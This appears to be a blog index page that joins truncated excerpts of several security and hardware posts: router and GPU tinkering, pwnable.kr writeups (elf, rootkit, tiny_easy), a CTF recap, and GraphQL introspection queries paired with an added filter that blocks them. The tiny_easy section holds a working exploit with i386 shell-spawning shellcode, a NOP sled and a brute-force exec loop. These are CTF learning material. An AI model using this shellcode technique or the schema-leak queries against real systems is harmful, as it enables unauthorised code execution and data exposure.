Modding RGB Fusion to fix mouse stutter on the Gigabyte Super Eagle (Aorus Master)

Preface

For learning and research only.

Last week I picked up a Gigabyte Super Eagle 6800XT on the second-hand market, planning to use it for a Hackintosh build.

The system is Windows 11. After the card arrived I installed the graphics driver and Gigabyte's RGB control software, RGB Fusion 2.0 (B22.0414.1, the latest version on the official site). The small screen looks nice, but mouse movement always felt slightly stuttery, most noticeable when drawing continuous circles with the mouse (my eyes are fairly sensitive to this).

It stutters roughly once per second. As shown in the images below: the first is normal, while in the second the distance between the first and second mouse positions is too long, i.e. a stutter:


Notes on a luac analysis

Preface

A Lua script a.lua on a MIPS router had been compiled into the luac binary format. Initial analysis showed that the luac file runs when lua is pointed at the firmware's shared library liblua.so.5.1.5, whereas official OpenWrt for the same architecture cannot run it, so liblua.so.5.1.5 must have been modified.


Tinkering: OpenWrt 21.02.1 on the JD Cloud Wireless Treasure Luban

Disclaimer

  1. For testing, learning and research only. The author did not "crack" the device in any way; all information was obtained through normal means.
  2. If any organization or individual believes the content of this article may infringe their rights, they should contact the author promptly and request removal of the relevant content.
  3. The author accepts no responsibility for any potential problems arising from this article, including but not limited to any loss or damage caused by any error.

Preface

A few days ago I bought a JD Cloud Wireless Treasure Luban on JD.com. Hardware specs:

CPU: MT7621A
RAM: Nanya 512MB
Flash: XM25QH128C 128Mbit/16MB
Wireless: MT7975DN + MT7905DAN
Ethernet: all gigabit, LLLW

I had originally just left it running benchmarks all day to earn JD beans, but the official firmware is really hard to live with, so let's get OpenWrt running on it.


pwnable.kr ELF writeup

0x01 Analysis

First, ssh in and take a look.

elf.py:

from ctypes import CDLL, c_char_p   # not shown in the excerpt; needed for CDLL/c_char_p
import sys
...
libc = CDLL('libc.so.6')
flag = CDLL('./libflag.so')   # the flag library is mapped into the same process

...
for i in xrange(25):          # 25 reads of 32 bytes each from a user-supplied address
    sys.stdout.write('addr?:')
    sys.stdout.flush()
    addr = int(raw_input(), 16)
    libc.write(1, c_char_p(addr), 32)   # write(1, addr, 32): an arbitrary-read primitive

We get 25 attempts, each reading 32 bytes of the process address space...

Now let's look at gen.py.


pwnable.kr rootkit writeup

0x01 Analysis

rootkit is another kernel-exploitation challenge, following syscall.

After connecting to the host, I found that the kernel loads the rootkit module at boot.

[    3.337631] rootkit: module license 'unspecified' taints kernel.

Then I used IDA to disassemble rootkit.ko.

The module disables write protection and replaces original syscalls such as sys_open with sys_open_hooked by writing to the syscall table (0xc15fa020).

The sys_open_hooked syscall checks whether the filename string contains the substring "flag".
If it does not, the original sys_open is called.
If it does, it returns a fd of -1, so the file open fails.

Of course, other syscalls such as sys_symlink fail as well.

/tmp # ln -s ../flag ./
[ 5234.521789] You will not see the flag...
ln: ./flag: Operation not permitted

hackgame-2021-wp

0x01 Summary

My first CTF: 2250 points, rank 109. One math-category problem I couldn't solve... room to improve.


graphql leak

0x01

  1. find all types
    {
      __schema {
        types {
          name
        }
      }
    }
  2. find all fields of a known type
    {
      __type (name: "Query") {
        name
        fields {
          name
          type {
            name
            kind
            ofType {
              name
              kind
            }
          }
        }
      }
    }
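As an added defensive counterpart to the two introspection queries above (not from the original post): a request filter that tokenizes the GraphQL document and refuses `__schema`/`__type` selections unless introspection is explicitly enabled. The `check_request` helper is hypothetical; the two query constants are the page's own queries, reproduced as sample input.

```python
import json
import re

# Root fields used by the two queries above; together they expose the whole
# schema. __typename is also a meta-field, but ordinary clients rely on it.
INTROSPECTION_FIELDS = {"__schema", "__type"}

# Tokens: comments, string literals (skipped, so "__schema" inside a string
# does not count), names, and single punctuation characters.
_TOKEN_RE = re.compile(r'#[^\n]*|"(?:\\.|[^"\\])*"|[_A-Za-z][_0-9A-Za-z]*|\S')

# The page's own introspection queries, reproduced here as sample input.
SCHEMA_TYPES_QUERY = "{ __schema { types { name } } }"
TYPE_FIELDS_QUERY = ('{ __type(name: "Query") { name fields { name '
                     'type { name kind ofType { name kind } } } } }')


def introspection_fields(query: str) -> set:
    """Introspection root fields selected anywhere in a GraphQL document.

    Token-based rather than a substring search: aliases (`s: __schema {..}`)
    are still caught, while string literals and comments are ignored.
    """
    found = set()
    for tok in _TOKEN_RE.findall(query):
        if tok[0] in '#"':
            continue
        if tok in INTROSPECTION_FIELDS:
            found.add(tok)
    return found


def check_request(body: str, allow_introspection: bool = False) -> dict:
    """Decide whether a POST /graphql JSON body may reach the executor.

    Malformed bodies are refused rather than passed through.
    """
    try:
        query = json.loads(body)["query"]
        if not isinstance(query, str):
            raise TypeError("query must be a string")
    except (ValueError, KeyError, TypeError) as exc:
        return {"allowed": False, "reason": f"malformed request: {exc}"}
    fields = introspection_fields(query)
    if fields and not allow_introspection:
        return {"allowed": False,
                "reason": f"introspection disabled: {sorted(fields)}"}
    return {"allowed": True, "reason": "ok"}
```

Leaving introspection on in production is what makes the two queries above leak the full schema; a filter like this, or the equivalent server option, closes that off while still letting `__typename` through.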

pwnable.kr tiny_easy writeup

0x01 Check security

$ checksec tiny_easy
[*] '/home/ubuntu/pwn/tiny_easy/tiny_easy'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)

NX disabled.

0x02 Disassemble

08048054 pop     eax
08048055 pop     edx
08048056 mov     edx, [edx]
08048058 call    edx

…?
What a tiny ELF..

0x03 Debug

(gdb) b *0x08048056
Breakpoint 1 at 0x8048056
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/ubuntu/pwn/tiny_easy/tiny_easy

Breakpoint 2, 0x08048056 in ?? ()
(gdb) info r
eax 0x1 1
ecx 0x0 0
edx 0xffff8943 -30397
ebx 0x0 0
esp 0xffff8818 0xffff8818
ebp 0x0 0x0
esi 0x0 0
edi 0x0 0
eip 0x8048056 0x8048056
eflags 0x202 [ IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb) x/7s $edx
0xffff8943: "/home/ubuntu/pwn/tiny_easy/tiny_easy"
0xffff8968: "SHELL=/bin/bash"
0xffff8978: "WSL_DISTRO_NAME=Ubuntu-20.04"
0xffff8995: "NAME=DESKTOP-TR6SWQE"
0xffff89aa: "PWD=/home/ubuntu/pwn/tiny_easy"
0xffff89c9: "LOGNAME=ubuntu"
0xffff89d8: "_=/usr/bin/gdb"
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x6d6f682f in ?? ()

Obviously, tiny_easy moves '/hom' (the first four bytes of argv[0]) into edx and then calls edx, so the program jumps to address 0x6d6f682f ('/hom') and triggers a segmentation fault.

$ exec --help
exec: exec [-cl] [-a name] [command [arguments ...]] [redirection ...]
Replace the shell with the given command.

Execute COMMAND, replacing this shell with the specified program.
ARGUMENTS become the arguments to COMMAND. If COMMAND is not specified,
any redirections take effect in the current shell.

Options:
-a name pass NAME as the zeroth argument to COMMAND
-c execute COMMAND with an empty environment
-l place a dash in the zeroth argument to COMMAND

If the command cannot be executed, a non-interactive shell exits, unless
the shell option `execfail' is set.

Exit Status:
Returns success unless COMMAND is not found or a redirection error occurs.

The exec command with the -a argument lets us pass a chosen argv[0] to COMMAND, which means we can place shellcode in an environment variable, pass a guessed shellcode address as argv[0], and then get a shell by brute force.

But the problem is, how to make a shellcode?

I guess we need pwntools…

$ python3
Python 3.8.10 (default, Jun 2 2021, 10:49:15)
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> asm(shellcraft.i386.linux.sh())
b'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'

And the shellcode address:

[email protected]:~$ export A=$(python -c 'print("jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80")')
[email protected]:~$ gdb ./tiny_easy
(gdb) b *0x8048058
Breakpoint 1 at 0x8048058
(gdb) r
Starting program: /home/tiny_easy/tiny_easy
Breakpoint 1, 0x08048058 in ?? ()
(gdb) info r
eax 0x1 1
ecx 0x0 0
edx 0x6d6f682f 1836017711
ebx 0x0 0
esp 0xffaaac18 0xffaaac18
ebp 0x0 0x0
esi 0x0 0
edi 0x0 0
eip 0x8048058 0x8048058
eflags 0x202 [ IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
k0 0x0 0
k1 0x0 0
k2 0x0 0
k3 0x0 0
k4 0x0 0
k5 0x0 0
k6 0x0 0
k7 0x0 0
(gdb) x/8xw 0xffaaac18
0xffaaac18: 0x00000000 0xffaabd9e 0xffaabdcd 0xffaabde3
0xffaaac28: 0xffaabdf3 0xffaabe07 0xffaabe2b 0xffaabe3f
(gdb) x/16s 0xffaabd9e
0xffaabd9e: "A=jhh///sh/bin\211\343h\001\001\001\001\201\064$ri\001\001\061\311Qj\004Y\001\341Q\211\341\061\322j\vX ̀"
0xffaabdcd: "XDG_SESSION_ID=118569"
0xffaabde3: "SHELL=/bin/bash"
0xffaabdf3: "TERM=xterm-256color"
0xffaabe07: "SSH_CLIENT=112.86.218.22 48280 2222"
0xffaabe2b: "SSH_TTY=/dev/pts/41"
0xffaabe3f: "USER=tiny_easy"
0xffaabe4e: "COLUMNS=120"
0xffaabe5a: "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin"
0xffaabec2: "MAIL=/var/mail/tiny_easy"
0xffaabedb: "_=/usr/bin/gdb"
0xffaabeea: "PWD=/home/tiny_easy"
0xffaabefe: "LANG=en_US.UTF-8"
0xffaabf0f: "LINES=30"
0xffaabf18: "HOME=/home/tiny_easy"
0xffaabf2d: "SHLVL=1"

Ok, use 0xffaabda0 as argv[0].

0x04 EXP

Before brute forcing, we should pad the shellcode with nops (\x90) to improve the success rate of the call edx.

export A=$(python -c 'print("\x90" * 30000 + "jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80")'); for i in {1..1000}; do bash -c "exec -a $(python -c 'print("\xa0\xbd\xaa\xff")') ./tiny_easy"; done